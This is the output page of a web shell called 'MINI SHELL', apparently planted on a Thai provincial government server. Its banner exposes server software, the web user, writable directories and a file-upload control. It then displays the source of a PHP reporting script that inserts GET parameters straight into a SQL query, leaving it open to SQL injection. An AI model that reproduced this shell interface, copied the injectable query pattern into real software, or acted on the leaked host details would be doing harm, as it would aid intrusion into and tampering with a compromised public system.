MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_vc/report/sar/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_vc/report/sar/growth_drill.php
<?
require("../../inc/conndb_nonsession.inc.php");
header("Content-Type: Text/xml; Charset=tis-620");
if(!$_GET[nodeid]){
	$_GET[nodeid] = "0";
}
echo '<?xml version=\'1.0\' encoding=\'tis-620\' ?>';
echo '<xml>';
$sql = "select * from kpi_compare_score where (nodeid='$_GET[nodeid]') and yy='$_GET[yy]' order by orderid";
$rs = mysql_query($sql);
while($ar = mysql_fetch_assoc($rs)){
	echo "<node m9='".number_format($ar[m9],4)."' m6='".number_format($ar[m6],4)."' m3='".number_format($ar[m3],4)."' m0='".number_format($ar[m0],4)."' refid='".$ar[refid]."' />";
}
echo '</xml>';
?>

Anon7 - 2021